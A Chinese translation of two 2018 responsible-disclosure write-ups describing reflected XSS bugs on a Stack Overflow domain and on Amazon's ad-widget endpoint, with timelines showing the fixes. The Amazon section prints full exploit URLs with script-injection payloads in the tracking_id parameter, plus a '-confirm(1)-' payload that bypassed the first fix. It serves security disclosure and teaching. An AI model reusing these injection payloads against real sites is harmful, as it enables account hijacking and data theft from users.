著名IT技术网站Stack Overflow和亚马逊网站反射型XSS
推特用户@newp_th(http://twitter.com/newp_th)于2018年分别公开了Stack Overflow网站和亚马逊网站的XSS漏洞,其漏洞利用过程都很相似,详细情况如下。
XSS on Stack Overflow
该XSS为反射型XSS。当时我正利用在Burpsuite爬取和测试其他公司的域名,并检查问题选项卡是否有曝出漏洞。突然,我感觉到Stack Overflow也许易受到XSS攻击的困扰(因为我正使用了反射型XSS检测插件https://github.com/elkokc/reflector)。所以我决定测试下Stack Overflow的域名。
反射型XSS检测插件:该Burp Suite插件能够在你浏览网站时,实时在页面上测试反射型XSS,它包括以下一些功能:
在响应选项卡中高亮显示反射内容。
测试此反射点允许使用哪些符号。
分析反射内容的上下文。
Conten-Type白名单。
当我测试Stack Overflow旗下域名时,我注意到cookie中有一个存在漏洞的参数prov
!!,当我把payload输入到参数prov
并按下回车时
我的IE浏览器收到了响应,弹出了XSS!!!!!
上报漏洞后我也收到了Stack Overflow的回复。
时间线
2018-2-14: 漏洞报告
2018-2-19: 正验证
2018-4-3: 已修复
XSS on Amazon
亚马逊网站的这个XSS漏洞和上个Stack Overflow网站的XSS漏洞的发现过程很相似。而且利用起来更加容易。
Payload:
具体链接:
https://ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=US&source=ss&ref=as_ss_li_til&ad_type=product_link&tracking_id=jgsbookselection%22%3E%3Csc ript/k/%3Ealert(113)%3C/sc ript/k/%3E&marketplace=amazon®ion=US&placement=1449319432&asins=1449319432&linkId=cc38d5883c3f92bbeb69b93a6810322a&show_border=true&link_opens_in_new_window=true
在初次向亚马逊安全团队报告这个问题几个星期之后,我收到回复,表示这个漏洞已被解决,于是我便再次验证。而在进一步的测试中,我还是可以很容易触发XSS,只不过这次使用的payload为-confirm(1)-
。
完整链接:
https://ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=US&source=ss&ref=as_ss_li_til&ad_type=product_link&tracking_id=1%22-confirm(1)-%22&marketplace=amazon®ion=US&placement=1449319432&asins=1449319432&linkId=cc38d5883c3f92bbeb69b93a6810322a&show_border=true&link_opens_in_new_window=true#
时间线
2018-5-29: 漏洞上报
2018-5-29: 漏洞被确认
2018-6-25: 漏洞修复
2018-6-27: 修复被绕过
2018-12-12: 漏洞解决
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://medium.com/@newp_th/reflected-xss-on-stack-overflow-b8366a855472
https://medium.com/@newp_th/reflected-xss-on-ws-na-amazon-adsystem-com-amazon-f1e55f1d24cf
最新评论